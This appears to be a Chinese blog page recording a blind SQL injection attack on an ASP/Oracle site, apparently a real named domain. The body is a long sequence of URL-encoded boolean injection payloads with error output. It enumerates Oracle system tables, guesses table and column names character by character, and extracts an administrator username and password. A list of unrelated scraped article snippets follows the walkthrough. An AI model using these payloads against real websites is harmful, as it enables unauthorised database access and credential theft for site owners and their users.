virus
virus

ASP+ORACLE注入手记

http://et.kpworld.com/star.asp?performer=马三立;
------------------------------------------------------
OraOLEDB 错误
'80040e14' ORA-00911:
invalid character
/star.asp,行83
说明过滤了分号。
[url]http://et.kpworld.com/star.asp?performer=[/url]马三立'
----------------------------------------------------
OraOLEDB 错误
'80004005' ORA-01756:
括号内的字符串没有正确结束
/star.asp,行83
看来存在未过滤单引号问题。
[url]http://et.kpworld.com/star.asp?performer=[/url]马三立' and '1'='1
----------------------------------------------------------------
闭和他单引号,正常返回。
and 0(select count(*) from admin) and '1'='1
-----------------------------------------------------------------
OraOLEDB 错误 '80040e37' ORA-00942:
table or view does not exist
/star.asp,行83
说明不存在ADMIN这个表.
******************************************************************
下面需要知道ORACLE的系统表:
确定表中行的总数:
select num_rows from user_tables where table_name='表名
----------------------存放当前用户所有表
where table_name='表名
'selectcolumn_name,
from user_tab_columns -----------------------存放所有列
where table_name='表名'
and 0(select count(*) from all_tables) and '1'='1
---------------------------------------------------------------------
存在!
all_tables是一个系统表,用来存放当前ID和其他用户的所有表
and 0(select count(*) from user_tables) and '1'='1
---------------------------------------------------------------------
返回。有这个系统表,这个表存放当前用户的所有表
and 0(select top 1 table_name from user_tables) and '1'='1
---------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00923:
FROM keyword not found where expected
/star.asp,行83
不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。
(经过PINKEYES测试已经确定确实不支持TOP 1)
and 0(select count(*) from user_tables where table_nam'')
and '1'='1
--------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00904:
invalid column name /star.asp,行83
当语法错误时,会显示无效列名字
and 0(select count(*) from user_tables where
table_name'''') and '1'='1
--------------------------------------------------------------------------------------------
语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试:
and 0(select count(*) from user_tables where
sum(table_name)>1) and '1'='1
------------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here
/star.asp,行83
组函数不允许在这里。
and 0(select count(*) from user_tables where avg(table_name)) and
'1'='1
-------------------------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00934:
group function is not allowed here
/star.asp,行83
组函数不允许在这里。
and 0(select to_char(table_name) from user_tables) and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80004005' ORA-01427:
single-row subquery returns more
than one row
/star.asp,行83
单行的子查询返回多于一行
and 0(select count(*) from user_tables where table_name+1)
and%20'1'='1
--------------------------------------------------------------------------
OraOLEDB 错误 '80040e14' ORA-00920:
invalid relational operator
/star.asp,行83
测试到这里,下面看看怎么弄出他的表来:
and 0(select count(*) from performer) and%20'1'='1
-----------------------------------------------------
成功返回。这里的表是看前面URL猜的.
and 0(select count(*) from user_tables where
table_name='performer') and%20'1'='1
-------------------------------------------------------------------------------------
没返回。失败标志。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER')
and%20'1'='1
------------------------------------------------------------------------------------------------
成功了! 看来这个user_tables表只认识大写字母!
and 0(select count(*) from user_tables where
length(table_name)>10) and%20'1'='1
------------------------------------------------------------------------------------
用length函数确定最长表的位数
and 0(select count(*) from user_tables where
length(table_name)=18) and%20'1'='1
-------------------------------------------------------------------------------------
省略若干步骤,最后确定最长表为18位。
and 0(select count(*) from user_tables where
substr(table_name,1,1)='A') and%20'1'='1
-----------------------------------------------------------------------------------------
第一位为'A',
and 0(select count(*) from user_tables where
substr(table_name,1,2)='AD') and%20'1'='1
-----------------------------------------------------------------------------------------
第二位为'AD'
and 0(select count(*) from user_tables where
substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
---------------------------------------------------------------------------------------------
省略若干,18位的表名为'ADMINAUTHORIZATION'。
and 1=(select count(*) from user_tables where
table_name='ADMINAUTHORIZATION') and%20'1'='1
--------------------------------------------------------------------------------------------
返回。
and 0(select count(*) from user_tables where
length(table_name)=2) and%20'1'='1
----------------------------------------------------------------------------------
最小表名长度为2
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
-------------------------------------------------------------------------------------------------
没返回。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25')
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
都成功返回。看来可以利用like猜。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8)
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
利用like和LENGTH组合猜,马上就能确定长度。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出第四位是S。接下来就是重复劳动了。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜出来了。'BBSSUBJECT'
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
没返回,不象是保存用户和密码的表。再来。。。
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
确定长度为15。
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)='U'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)='S'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)='USER'%20and%20length(table_name)=15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='UNSUBSCRIBEUSER')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
确定表名'UNSUBSCRIBEUSER',接下来猜是否有密码字段。。。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='UNSUBSCRIBEUSER'%20and%20column_name%20like%20'%25PASS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
like PASS,没返回,郁闷,继续。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25PASS%25'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
返回。不准确。
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)='SS')
and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)='SS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS')
and%20'1'='1
-------------------------------------------------------------------------------------------------
这里用SUBSTR缩小范围.
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)='PASS'%20and%20length(column_name)=11)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
含有PASS字段的字段长度11位。根据上面的从4位开始数4位是PASS 那么PASS前是3位,后是4位,一共是11位。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)='PASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
猜一下,果然是。。。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
全返回,确定密码字段名字'STRPASSWORD'。把密码字段抓到就好办了,再利用他抓表名:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20length(table_name)=13)
and '1'='1
-------------------------------------------------------------------------------------------------
返回,和上面猜出的表名长度符合。用SUBSTR猜出他名字:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20substr(table_name,1,13)='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20column_name='STRPASSWORD'%20and%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tables%20where%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
全返回,确定表名为:'ADMINISTRATOR'.
and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR')
and '1'='1
-------------------------------------------------------------------------------------------------
猜出表里有8个字段。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25ID%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and '1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-2,2)='ID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
可以判断是ID结尾了,长度为5。
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-5,5)='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name='LNGID')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
出来了,LNGID。
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
最小ID,最大ID也出来,接下来弄密码:
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
LNGID为8的密码长度为4
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第一位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第二位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第三位
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
第四位
STRPASSWORD:test
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
OH,YEAH~~密码出来了。
接着搞用户名:
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20like%20'%25NAME%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,-4,4)='NAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20substr(column_name,1,7)='STRNAME')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
出来了,字段:STRNAME
and%200(select%20count(*)%20from%20user_tab_columns%20where%20table_name='ADMINISTRATOR'%20and%20column_name%20not%20in('STRNAME','STRPASSWORD','LNGID'))%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
STRNAME值长度为4,不会是和密码相同吧。。。
and%200(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD='test'%20and%20LNGID=8%20and%20STRNAME='test')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
呵呵,果然。
表名ADMINISTRATOR,列名:STRNAME,STRPASSWORD,LNGID
LNGID=8 STRNAME=test STRPASSWORD=test
测试完成!剩下的只是时间问题了。

你可能感兴趣的:(oracle,职场,asp,休闲)

  • 用Python搞定接口自动化测试:轻松实现RPC协议接口测试_python测试rpc接口 2401_84141210 程序员rpc网络协议网络
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!Hessian是一款基于HTTP协议的RPC框架,采
  • 新生入门:进大学前你必须想好的几件事 河南热爱教育
    大学,自一千多年前开创以来直到现在,仍然是一个令人向往的名词。在这里,有文化知识、有意识形态、有学科分类,有学长学姐……总之,大学虽然只有短短四年,但是对于人的影响却是巨大的。作为校园到社会的一个跳板,作为学生身份到职场人身份的一个过渡期,大学,是一个人塑造成熟思想和思维的重要时期。正好,现在正值开学季,各大院校新生即将开始军训。就让我们躲在大树的阴凉之下,喝着冰阔落,好好给各位正在太阳底下暴晒的
  • 老板奖励1万,我花一千八请吃饭,酒桌上同事说句话,我掀翻桌子 可可小妹妹
    现如今,真正想要在职场上结交到真心朋友,个人感觉还是挺难的。原因也很简单,因为会有利益冲突。你能力强拿高工资,别人羡慕嫉妒,你能力差,别人瞧不起你。但不管如何,人还是要学会保护自己,别意气用事。但有时候遇到一些事情,真的很难忍。在我大学毕业的时候,因为家里条件一般吧,而自己又比较要强,本来成绩很好的我,最后选择了让人难以理解的销售工作,对于一个女生来说,更是如此。在第一份工作的时候,当时的领导看我
  • 膨胀腐蚀操作opencv dilate膨胀白膨胀,erode腐蚀是黑吃白。主要针对二值图 tony365 opencv人工智能计算机视觉
    效果:代码:importcv2importnumpyasnpfrommatplotlibimportpyplotaspltif__name__=="__main__":h=10w=10data=np.random.normal(0,1,[h,w])#sigma,2*sigma,3*sigma之间的数的比例分别为0.68,0.96,0.99mask_new=data>2print(data)prin
  • 能力强的人,有资格发脾气 小绿逗
    前两天和一个朋友聊天,她说:“我宁愿和脾气很差,但能力很强的人工作,也坚决不和那些脾气特别好,但能力不行的人工作。”我深表赞同。为什么?因为吃太多亏了。职场是一个以结果论英雄的地方。你能力强,能产出好的工作成果,帮我搞定难搞的问题,你对我脾气再差我都愿意忍。相反你能力不行,说什么都照单全收,从不反驳也不发脾气,永远一副好好先生的样子,一点用都没有。写方案卡壳了,没有解决办法。讨论陷入僵局了,没有观
  • 在树莓派上构建和部署 Node.js 项目 上海晶珩EDATEC node.js树莓派RaspberryPi树莓派5RaspberryPi5
    探索在RaspberryPi上构建和部署Node.js项目的最佳实践。通过我们的专业提示和技巧,克服常见挑战,使您的项目顺利运行。去年圣诞节,我收到了一份极其令人着迷的礼物,它占据了我许多周末的时间,甚至让我夜不能寐。它就是全新的RaspberryPiZero。它带来了无穷无尽的可能性,并且情不自禁占据着我的大脑,所以我采取了唯一明显的行动方案就是把它扔进抽屉里,然后慢慢远离它。几个月后,我读到了
  • # Seaborn热图修改画布大小|Seaborn热图修改横纵坐标大小|Seaborn删除注释|Seaborn删除调色板|Seaborn注释添加标注文字|Seaborn删除刻度线 Red Red 生信小技巧python开发语言ux笔记学习方法
    Seaborn热图修改画布大小|Seaborn热图修改横纵坐标大小|Seaborn删除注释|Seaborn删除调色板|Seaborn注释添加标注文字|Seaborn删除刻度线查看图片importmatplotlibaspltplt.show()修改画布大小#导入需要用到的相关包importseabornassnsimportpandasaspdimportmatplotlibfromsklearn
  • asp.net core 自定义过滤器 注入的几种方式和实现 彭小彭~ .netcore.netcore
    在ASP.NETCore中,过滤器(Filters)是一种在MVC应用程序中运行代码的方法,可以在操作(Actions)执行之前或之后运行。过滤器可以应用于控制器(Controllers)或特定的操作方法。过滤器可以用来实现跨切面的逻辑,比如异常处理、授权、缓存、日志等。有几种类型的过滤器:授权过滤器(Authorizationfilters)资源过滤器(Resourcefilters)操作过滤器
  • 随笔微思|好搭档怎么来? 杰初待裱
    #每天一点心理学#在工作中,如果遇到新人搭档比较懒怎么办?在现在的职场工作中,求职的人很多,离职的人一样也很多。有些是因为自身原因,有些是因为职场需求原因。总而言之,现在工作中换搭档都已经是家常便饭了。工作中,如果遇到一个好搭档,配合起来那工作时的感觉是很不一样的,充满着热情和生机。反之就是死气沉沉和郁闷。而且,在职场中,换工作可能是自己说了算,换搭档可能就不是自己说了算的。所以呢,如果遇到新人搭
  • pandas读取带有表头的数据文件,读取无表头的数据文件 小桥流水---人工智能 人工智能深度学习Python程序代码pandas
    在Python中使用pandas库读取数据时,常见的问题之一就是如何处理数据文件中的表头。1.引入pandas库在开始之前,我们首先需要导入pandas库。如果你的环境中还未安装pandas,可以使用pip安装:pipinstallpandas导入pandas库:importpandasaspd2.读取带有表头的数据文件当数据文件中包含表头时,pandas会默认将第一行数据作为DataFrame的
  • 2024年Python最全Python-Matplotlib可视化(1)——一文详解常见统计图的绘制(1) 2401_84558452 程序员pythonmatplotlib开发语言
    importmatplotlib.pyplotaspltx=range(50)y=[value*2forvalueinx]plt.plot(x,y)plt.show()上述代码将会绘制曲线y=2*x,其中x在[0,50]范围内,如下所示:可以看到窗口上方还包含多个图标,其中:|项目|Value||—|—|||此按钮用于将所绘制的图形另存为所需格式的图片,包括png,jpg,pdf,svg等常见格式
  • 春蚕,请加油 张瑞Jerrysher
    最近春天到了,大家都在养蚕。上周六我们小区有活动,我也有幸得到了几只蚕宝宝。很多年都没有养蚕宝宝了,本质上我还是一个很喜欢小动物和小植物的人。虽然现在已经毕业多年,是一个职场人士了,但喜欢动物,植物的新丝毫没有减退。接着给宝宝养成的名义,我也养了几只蚕。周日一天不断的去看蚕宝宝的活动,他们吃宵夜的时候还认真。咯吱咯吱的响,听起来好香那样子。真的是很有趣。为了让他们有个舒适的环境,我把桑叶一片一片的
  • 关键字提取 蓝色滑行
    关键词提取importpandasaspdimportjieba.analyse#导入关键词库读取文本fn=open('d:/collect.txt',encoding='UTF-8')string_data=fn.read()fn.close()关键词提取"TF-IDF(termfrequency-inversedocumentfrequency)是一种针对关键字的统计分析方法,用来评估关键字或
  • 每日分享| 不求棋高一着,但求落子无悔 治愈系蕾蕾
    一、书中思考(P142-143《富兰克林自传》)书中案例:詹姆斯洛根和他的主人旧时一起乘船的往事,在以为遇到敌情的时候,船长告诉教友会的所有成员他们可以到船舱躲避,但詹姆斯洛根没有下去,依然坚持留在甲板上准备参与战斗,最后发现没有敌情,他去向主人汇报的时候,结果遭受到了主人威廉佩恩的批评。1、听话、服从、忠诚比能力突出更有前途。忠诚之心远远超越抖出来的机灵。忠诚在职场中,要想混得好,首先要忠诚,听
  • 谁都曾是少女 每天都想死
    谁都曾是少女5月13号,母亲节到来了,这是一个妈妈的节日,妈妈的妈妈的节日……我家里除了我之外还有两个小朋友,弟弟和妹妹,,他们不同于我,他们正处于嗷嗷待哺的年纪,一个三岁,一个才一岁。虽然家里请了阿姨,但妈妈还是大部分时间都用在了弟弟妹妹身上,而且同时还要关心公司的事务,可以说是非常繁忙了。妈妈年轻的时候大部分也都在专心于事业,并没有多么的爱美,也没有把时间放在休闲玩乐上。老实讲,由于时代和家庭
  • 幸福公式打卡2023.5.7 玲玲成长日记
    幸福=健康+关系+财富【健康】身体&心灵&时间1.作息:晚10早5:302.冥想:20分钟。问心无愧尽人事,俯首随顺听天命。【关系】家庭&人际&休闲1.感恩婆婆,每天无怨无悔的帮我带娃做饭收拾家务,婆婆是自我价值感很低的人,很多行为是无意识的,很多时候只是为了获得别人的认同,接纳婆婆的行为,同时尽力赞美肯定婆婆,感恩,感谢!2.感恩闺女引领我成长,昨天闺女因为忘记做作业而感到焦虑,甚至着急到哭,我
  • 数据库有关c语言 h海棠溪 数据库学习c语言linux
    数据库的概念SQL(StructuredQueryLanguage)是一种专门用来与数据库进行交互的编程语言,它允许用户查询、更新和管理关系型数据库中的数据。关系型数据库是基于表(Table)的数据库,其中表由行(Row)和列(Column)组成,每一行代表一个记录(Record),每一列代表一个字段(Field)。非关系型数据库MongoDB1、分类:大型中型小型ORACLEMYSQL/MSSQ
  • 从西游记中,悟出的3点职场心得,太精辟了! 这个馒头有馅
    在西游记中,之所以唐僧师徒四人可以取得真经,是因为在这个过程中,他们有十分良好的职场哲学。正是这些哲学,带领他们,走过了十万八千里,度过了九九八十一难,最终取得真经。那么在西游记中有哪些职场哲学值得我们学习呢?image1.有一个清晰可见的目标在西游记中,他们有一个共同的信念,那就是行走十万八千里,到达西天,取得真经。目标可能很远,但是却十分具体。他们每走一步就向目标迈进了一步。因为毕竟这个目标是
  • python绘制蕨菜叶分形 镜花照无眠 编程仿真#Pythonpython开发语言matplotlibnumpy
    一花一叶一世界,一草一木一浮生.使用了四个不同的线性变换,根据概率选择其中一个变换并更新x和y坐标。然后将生成的绿色点绘制出来,形成一片蕨菜叶。importnumpyasnpimportmatplotlib.pyplotaspltdeffern_fractal(num_points):#初始化坐标x,y=0,0points=[]for_inrange(num_points):#生成随机数以选择变换
  • 第11章 使用Razor Pages 代数狂人 ASP.NETCore框架之旅c#asp.net
    第11章使用RazorPagesRazorPages是ASP.NETCore提供的一种基于页面的编程模型,它简化了Web开发的复杂性,使得开发者可以更加专注于业务逻辑的实现。RazorPages融合了MVC架构的优点,同时减少了开发者需要编写的样板代码量。在本章中,我们将详细介绍如何在ASP.NETCore应用程序中使用RazorPages,包括RazorPages的基本概念、页面路由、页面模型、
  • 摄影分享:第8周(周一&周二) 千允
    同舟学院丨摄影分享自己拍摄的图片,加一句简单说明。每日限一张。奖励方式:每参与一天,奖励一朵;连续参与一周,额外奖励一朵。周一群内摄影分享情况1、L文苓丝瓜~2、田心尔小森林公园~3、佛晓星辉去这里做艾灸按摩,这里还是很讲究的。4、休闲清昶晨空。5、HellenJin无字。6、褐瞳浅言烧红了天边。7、宇中静树馋这个。8、晨妈爱阅读无字。9、绳系每个女人都有个少女梦。10、幸福小花园天气凉爽,孔雀草
  • 【AI大模型应用开发】【LangChain系列】9. 实用技巧:大模型的流式输出在 OpenAI 和 LangChain 中的使用 同学小张 大模型人工智能langchaingpt笔记经验分享agi
    大家好,我是同学小张,日常分享AI知识和实战案例欢迎点赞+关注,持续学习,持续干货输出。+v:jasper_8017一起交流,一起进步。微信公众号也可搜【同学小张】本站文章一览:当大模型的返回文字非常多时,返回完整的结果会耗费比较长的时间。如果等待大模型形成完整的答案再展示给用户,明显会给用户不好的体验。所以,现在市面上大多数的AI应用,在给用户结果时,都是以流式输出的方式展示给用户的。所谓的流式
  • Tomcat与JDK版本对应关系,Tomcat各版本特性 2401_84048671 程序员javatomcat开发语言
    ApacheTomcat8.xApacheTomcat7.xApacheTomcat6.xApacheTomcat是一个开源软件实现了JavaServlet和JavaServerPages技术。不同版本的Servlet和JSP规范可使用不同版本的ApacheTomcat。Tomcat与JDK版本对应关系为:|Servlet规格|JSP规范|EL规格|WebSocket规范|JASPIC规格|Apa
  • 创建索引oracle 很慢,Oracle 11G – 插入时索引的性能影响 智臾科技 创建索引oracle很慢
    目的验证插入没有PK/索引的记录加上后来创建的记录是否真的比插入PK/索引更快.注意这里的要点不是索引需要更多时间(很明显),但总成本(不带索引的插入创建索引)高于(使用索引插入).因为我被教导插入没有索引并且稍后创建索引因为它应该更快.环境DELLLatitude核心i72.8GHz8G内存和Windows上的Windows764位SSD硬盘Oracle11GR264位背景我被教导插入没有PK/
  • Anaconda安装与Python虚拟环境配置保姆级图文教程(附速查字典)_anaconda配置python环境 2401_84976246 程序员c语言c++学习
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以添加戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!目录1混乱的Python库2什么是Anacond
  • 程序员技术练级攻略 bo o ya ka 操作系统设计模式python
    转自:http://coolshell.cn/articles/4990.html前言你是否觉得自己从学校毕业的时候只做过小玩具一样的程序?走入职场后哪怕没有什么经验也可以把以下这些课外练习走一遍(朋友的抱怨:学校课程总是从理论出发,作业项目都看不出有什么实际作用,不如从工作中的需求出发)建议:不要乱买书,不要乱追新技术新名词,基础的东西经过很长时间积累而且还会在未来至少10年通用。回顾一下历史,
  • 【周检视】0210-2019第X周 babyQjy
    佳佳好习惯养成:日常:早起、锻炼、看书、记账、Time、日记美好:面膜、泡脚、看电影、交友易效能:打卡、晨间日记、100讲一,好习惯篇【早起】本周践行的好习惯,仍然是早睡早起,早起打卡。【健康】2.4-2.10keep三次【学习计划】听书二本看书一本【工作篇】02050206020702080209初六开工0210【休闲篇】除夕-春节2020204家庭聚餐0206紫金山0209外婆家
  • 领导让我临时支持个项目,我拒绝了 锦语良言
    事情就如标题说的那样,领导让我临时支持个项目,我拒绝了。今天这件事,让我看到了自己的勇气,让我看到了自己的理智,让我更看清了自己的未来。温馨提示,本篇文章作为心得分享,仅作为记录自己的进步之处,不可作为拒绝领导的理由之参考。为什么说是勇气?因为从小到大,家庭以及学校给我的教育观念便是,不要拒绝人,尤其是长辈。他们教给我的都是逆来顺受。职场嘛,忍忍就好了。但是,有的时候,你自认为正确的事情,为什么不
  • MYSQL--数据查询语言DQL--连接查询\分页查询\子查询\联合查询 _twinkle_ 每天学习8hMYSQLsql数据库mysql
    连接查询含义:又称多表查询,当查询的字段来自于多个表时,就会用到连接查询笛卡尔乘积现象:表1有m行,表2有n行,结果=m*n行发生原因:没有有效的连接条件如何避免:添加有效的连接条件分类:按年代分类:sql92标准:仅仅支持内连接sql99标准【推荐】:支持内连接+外连接(左外和右外)+交叉连接按功能分类:内连接:等值连接非等值连接自连接外连接:左外连接右外连接全外连接(Oracle支持)交叉连接
  • 【.NET全栈】ASP.NET开发Web应用——ADO.NET数据访问技术 JosieBook #.NET全栈.netasp.net前端
    文章目录前言一、ADO.NET基础1、ADO.NET架构2、ADO.NET数据提供者二、连接数据库1、SqlConnection数据库连接类2、使用SqlConnectionStringBuilder连接字符串3、关闭和释放连接4、在web.config配置文件中保存连接字符串5、连接池技术三、与数据库交互1、使用SqlCommand操作数据库2、为SqlCommand传递参数3、使用SqlCom
  • mongodb3.03开启认证 21jhf mongodb
    下载了最新mongodb3.03版本,当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题,现总结如下: (百度上搜到的基本都是老版本的,看到db.addUser的就是,请忽略) Windows下我做了一个bat文件,用来启动mongodb,命令行如下: mongod --dbpath db\data --port 27017 --directoryperdb --logp
  • 【Spark103】Task not serializable bit1129 Serializable
